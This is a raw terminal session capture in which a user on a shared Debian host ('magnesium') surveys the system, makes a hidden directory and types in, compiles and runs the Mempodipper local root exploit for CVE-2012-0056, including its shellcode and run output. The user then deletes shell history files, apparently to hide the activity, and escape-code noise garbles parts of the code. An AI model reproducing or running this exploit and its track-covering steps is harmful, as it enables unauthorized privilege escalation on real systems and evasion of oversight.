XPmDqyVksJZ7VX1zrhqDCTm4CiRcGPm7Kno23pSf2BncWXKMHvmMeMnFqaumS5Qd RvOIsF5jHBuWW+UsG7E7NAfp+5vxXUKKQvjxVuwaiLte/84IMHBOjytmbvAejkIr BrexZbd7N6kgCyjJN5yzArdo6YNzIgYO2+dkTy/Rrc+Nr/t7duent2t9++RdkJ+e oiBLcF8RYSBFy6VEEUVfd09tjgi9HTE17q9r7cmW0QNo6t1nQyblPMPGz1UOZg== -----END CERTIFICATE----- % magnesium% ccat openvpn.conf client cipher AES-256-CBC remote 199.229.249.189 port 53 ca ca.crt auth-user-pass dev tun proto udp nobind auth-nocache script-security 2 persist-key persist-tun comp-lzo % magnesium% llsof -P -i -n % magnesium% lsof -P -i -n  -i -i i -i  zsh: command not found: lsof-i % magnesium% lsof-i -i % magnesium% mman lsof [?1049h[?1h= LSOF(8) LSOF(8)  NAME lsof - list open files  SYNOPSIS lsof [ -?abChKlnNOPRtUvVX ] [ -A A ] [ -c c ] [ +c c ] [ +|-d d ] [ +|-D D ] [ +|-e s ] [ +|-f [cfgGn] ] [ -F [f] ] [ -g [s] ] [ -i [i] ] [ -k k ] [ +|-L [l] ] [ +|-m m ] [ +|-M ] [ -o [o] ] [ -p s ] [ +|-r [t[m]] ] [ -s [p:s] ] [ -S [t] ] [ -T [t] ] [ -u s ] [ +|-w ] [ -x [fl] ] [ -z [z] ] [ -Z [Z] ] [ -- ] [names]  DESCRIPTION Lsof revision 4.86 lists on its standard output file information about files opened by processes for the following UNIX dialects:  Apple Darwin 9 and Mac OS X 10.[567] FreeBSD 4.9 and 6.4 for x86-based systems FreeBSD 8.2, 9.0 and 10.0 for AMD64-based systems Linux 2.1.72 and above for x86-based systems Solaris 9, 10 and 11  (See the DISTRIBUTION section of this manual page for information on how to obtain the latest lsof revision.)  An open file may be a regular file, a directory, a block special file, a character special file, an executing text reference, a library, a stream or a network file (Internet socket, NFS file or UNIX domain socket.) A specific file or all the files in a file system may be selected by path.  Instead of a formatted display, lsof will produce output that can be parsed by other programs. See the -F, option description, and the OUTPUT FOR OTHER PROGRAMS section for more information.  In addition to producing a single output list, lsof will run in repeat mode. In repeat mode it will produce output, delay, then repeat the output operation until stopped with an interrupt or quit signal. See the +|-r [t[m]] option description for more information.  OPTIONS In the absence of any options, lsof lists all open files belonging to all active processes.  If any list request option is specified, other list requests must be specifically requested - e.g., if -U is speciā€ fied for the listing of UNIX socket files, NFS files won't be listed unless -N is also specified; or if a user list is specified with the -u option, UNIX domain socket files, belonging to users not in the list, won't be listed unless the -U option is also specified.  Normally list options that are specifically stated are ORed - i.e., specifying the -i option without an address and the -ufoo option produces a listing of all network files OR files belonging to processes owned by user ``foo''. The exceptions are:  Manual page lsof(8) line 1 (press h for help or q to quit) [?1l>[?1049l% magnesium% ccd root/  cd: permission denied: root % magnesium% lls bin ca.crt etc initrd.img lib media openvpn.conf proc run selinux sys usr vmlinuz boot dev home initrd.img.old lost+found mnt opt root sbin srv tmp var vmlinuz.old % magnesium% ccd tmp/  % magnesium% lls hsperfdata_valcorb tmux-1000 % magnesium% ccat hsperfdata_valcorb/  cat: hsperfdata_valcorb: Permission denied % magnesium% ccd hsperfdata_valcorb/  cd: permission denied: hsperfdata_valcorb % magnesium% lls hsperfdata_valcorb tmux-1000 % magnesium% ccd .. % magnesium% lls bin ca.crt etc initrd.img lib media openvpn.conf proc run selinux sys usr vmlinuz boot dev home initrd.img.old lost+found mnt opt root sbin srv tmp var vmlinuz.old % magnesium% ccd run/  % magnesium% lls acpid.pid console crond.reboot initramfs motd.dynamic rsyslogd.pid sshd utmp acpid.socket ConsoleKit dbus lock mount screen sshd.pid atd.pid console-kit-daemon.pid exim4 minissdpd.pid network sendsigs.omit.d tor bitlbee.pid crond.pid initctl minissdpd.sock prosody shm udev % magnesium% ccd .. % magnesium% uuname -a Linux magnesium 3.2.0-4-686-pae #1 SMP Debian 3.2.32-1 i686 GNU/Linux % magnesium% pphp -v PHP 5.4.4-10 (cli) (built: Nov 24 2012 12:48:13) Copyright (c) 1997-2012 The PHP Group Zend Engine v2.4.0, Copyright (c) 1998-2012 Zend Technologies % magnesium% vvim p  v  ccd ~ % magnesium% mmkdir .bash_q % magnesium% ccd .bash_q/  % magnesium% lls % magnesium% vvim pipe.c zsh: command not found: vim % magnesium% vvi pipe.c [?1049h[?1h=[?12;25h[?12l[?25h[?25l"pipe.c" [New File]~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ [?12l[?25h[?25li[?12l[?25h[?25l[?12l[?25h[?25l * * CVE-2012-0056 */#define _LARGEFILE64_SOURCE#define _GNU_SOURCE#include #include #include #include #include #include #include #include #include #include #include #include #include #include #include char *prog_name;int send_fd(int sock, int fd){ char buf[1]; struct iovec iov; struct msghdr msg; struct cmsghdr *cmsg; int n; char cms[CMSG_SPACE(sizeof(int))]; buf[0] = 0; iov.iov_base = buf; iov.iov_len = 1; memset(&msg, 0, sizeof msg); msg.msg_iov = &iov; msg.msg_iovlen = 1; msg.msg_control = (caddr_t)cms; msg.msg_controllen = CMSG_LEN(sizeof(int)); cmsg = CMSG[?12l[?25h[?25l}int recv_fd(int sock) { int n; int fd; char buf[1]; struct iovec iov; struct msghdr msg; struct cmsghdr *cmsg; char cms[CMSG_SPACE(sizeof(int))];  iov.iov_base = buf; iov.iov_len = 1; memset(&msg, 0, sizeof msg); msg.msg_name = 0; msg.msg_namelen = 0; msg.msg_iov = &iov; msg.msg_iovlen = 1; msg.msg_control = (caddr_t)cms; msg.msg_controllen = sizeof cms; if ((n = recvmsg(sock, &msg, 0)) < 0)  return -1; if (n == 0) return -1; cmsg = CMSG_FIRSTHDR(&msg); memmove(&fd, CMSG_DATA(cmsg), sizeof(int)); close(sock); return fd;}unsigned long ptrace_address() { int fd[2]; printf("[+] Creating ptrace pipe.\n"); pipe(fd); fcntl(fd[0], F_SETFL, O_NONBLOCK); printf("[+] Forking ptrace child.\n"); int child = fork(); if (child) [?12l[?25h[?25l { close(fd[1]); char buf; printf("[+] Waiting for ptraced child to give output on syscalls.\n"); for (;;) { wait(NULL); if (read(fd[0], &buf, 1) > 0) break; ptrace(PTRACE_SYSCALL, child, NULL, NULL); } printf("[+] Error message written. Single stepping to find address.\n"); struct user_regs_struct regs; for (;;) { ptrace(PTRACE_SINGLESTEP, child, NULL, NULL); wait(NULL); ptrace(PTRACE_GETREGS, child, NULL, ®s); #if defined(__i386__) #define instruction_pointer regs.eip #define upper_bound 0xb0000000 #elif defined(__x86_64__) #define instruction_pointer regs.rip #define upper_bound 0x700000000000 #else #error "That platform is not supported." #endif if (instruction_pointer < upper_bound) { unsigned long instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL); if ((instruction & 0xffff) == 0x25ff /* jmp r/m32 */) return instruction_pointer; } } } else { printf("[+] Ptrace_traceme'ing process.\n"); if (ptrace(PTRACE_TRACEME,[?12l[?25h[?25l 0, NULL, NULL) < 0) { perror("[-] ptrace"); return 0; } close(fd[0]); dup2(fd[1], 2); execl("/bin/su", "su", "not-a-valid-user", NULL); } return 0; } unsigned long objdump_address() { FILE *command = popen("objdump -d /bin/su|grep ''|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'",, "r"); if (!command) { perror("[-] popen"); return 0; } char result[32]; fgets(result, 32, command); pclose(command); return strtoul(result, NULL, 16); } unsigned long find_address() { printf("[+] Ptracing su to find next instruction without reading binary.\n"); unsigned long address = ptrace_address(); if (!address) { printf("[-] Ptrace failed.\n"); printf("[+] Reading su binary with objdump to find exit@plt.\n"); address = objdump_address(); if (address == ULONG_MAX || !address) { printf("[-] Could not resolve /bin/su. Specify the exit@plt function address manually.\n"); printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", prog_name, prog_name); e[?12l[?25h[?25l printf("[+] Resolved call address to 0x%lx.\n", address); return address;}int su_padding(){ printf("[+] Calculating su padding.\n"); FILE *command = popen("/bin/su this-user-does-not-exist 2>&1", "r"); if (!command) { perror("[-] popen"); exit(1); } char result[256]; fgets(result, 256, command); pclose(command); strstr(result, "this-user-does-not-exist") - result; int child(int sock) char parent_mem[256]; sprintf(parent_mem, "/proc/%d/mem", getppid()); printf("[+] Opening parent mem %s in child.\n", parent_mem); int fd = open(parent_mem, O_RDWR); if (fd < 0) { perror("[-] open"); return 1; }printf("[+] Sending fd %d to parent.\n", fd); send_fd(sock, fd); return 0; }int parent(unsigned long address) { int sockets[2]; printf("[+] Opening socketpair.\n"); if (socketpair(AF_UNIX, SOCK_STREAM, 0, sockets) < 0) {perror("[-] socketpair"); return 1; } if (fork()) { printf("[+] Waiting for transferred fd in parent.\n"); int fd = recv_fd(sock[?12l[?25h[?25lkets[1]); printf("[+] Received fd at %d.\n", fd); if (fd < 0) { perror("[-] recv_fd"); return 1; } printf("[+] Assigning fd %d to stderr.\n", fd); dup2(2, 15); dup2(fd, 2); unsigned long offset = address - su_padding(); printf("[+] Seeking to offset 0x%lx.\n", offset); lseek64(fd, offset, SEEK_SET); #if defined(__i386__) // See shellcode-32.s in this package for the source. char shellcode[] = "\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3" "\x0f\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68" "\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89" "\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd" "\x80"; #elif defined(__x86_64__) // See shellcode-64.s in this package for the source. char shellcode[] = "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x48" "\x31\xf6\x40\xb7\x0f\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f" "\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7" "\x48\x31\xdb\x6[?12l[?25h[?25l66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50" "\x51\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05"; #else #error "That platform is not supported." #endif printf("[+] Executing su with shellcode.\n"); execl("/bin/su", "su", shellcode, NULL); } else { char sock[32]; sprintf(sock, "%d", sockets[0]); printf("[+] Executing child from child fork.\n"); execl("/proc/self/exe", prog_name, "-c", sock, NULL); } return 0; } int main(int argc, char **argv) { prog_name = argv[0]; if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c') return child(atoi(argv[2])); printf("===============================\n"); printf("= Mempodipper =\n"); printf("= by zx2c4 =\n"); printf("= Jan 21, 2012 =\n"); printf("===============================\n\n"); if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'o') return parent(strtoul(argv[2], NULL, 16)); else return parent(find_address()); }[?12l[?25h[?25l :[?12l[?25hwq [?25l"pipe.c" [New File] 287 lines, 7093 characters written [?1l>[?12l[?25h[?1049l% magnesium% ggcc pipe.c  -O piper gcc: error: piper: No such file or directory % magnesium% gcc pipe.c -O piper        % magnesium% lls a.out pipe.c % magnesium% ../.  ccjm c chmod 777 a.out   % magnesium% ../a.out   =============================== = Mempodipper = = by zx2c4 = = Jan 21, 2012 = =============================== [+] Ptracing su to find next instruction without reading binary. [+] Creating ptrace pipe. [+] Forking ptrace child. [+] Waiting for ptraced child to give output on syscalls. [+] Ptrace_traceme'ing process. [+] Error message written. Single stepping to find address. [+] Resolved call address to 0x8049a50. [+] Opening socketpair. [+] Waiting for transferred fd in parent. [+] Executing child from child fork. [+] Opening parent mem /proc/21209/mem in child. [+] Sending fd 6 to parent. [+] Received fd at 6. [+] Assigning fd 6 to stderr. [+] Calculating su padding. [+] Seeking to offset 0x8049a36. [+] Executing su with shellcode. ^C % magnesium% lls a.out pipe.c % magnesium% ls./a.out I'm gay % magnesium% LLOL zsh: command not found: LOL % magnesium% ccat a.out   #!/bin/bash echo "I'm gay" % magnesium% llsl  ccd .. % magnesium% lls % magnesium% lls -la total 72 drwxr-xr-x 3 mmaton mmaton 4096 Jan 9 21:58 . drwxr-xr-x 36 root root 4096 Jan 9 21:20 .. -rw------- 1 mmaton mmaton 16 Jan 9 21:42 .bash_history -rw-r--r-- 1 mmaton mmaton 220 Jan 9 21:20 .bash_logout drwx------ 2 mmaton mmaton 4096 Jan 9 21:59 .bash_q -rw-r--r-- 1 mmaton mmaton 3544 Jan 9 21:43 .bashrc -rw-r--r-- 1 mmaton mmaton 675 Jan 9 21:20 .profile -rw------- 1 mmaton mmaton 33960 Jan 9 21:44 .zcompdump -rw------- 1 mmaton mmaton 5 Jan 9 21:44 .zsh_history -rw------- 1 mmaton mmaton 1295 Jan 9 21:44 .zshrc % magnesium% rrm -rf .bash .bash_history .bash_logout .bash_q/ .bashrc rm -rf .bash) _q/  % magnesium% lls % magnesium% llogout logout: not login shell %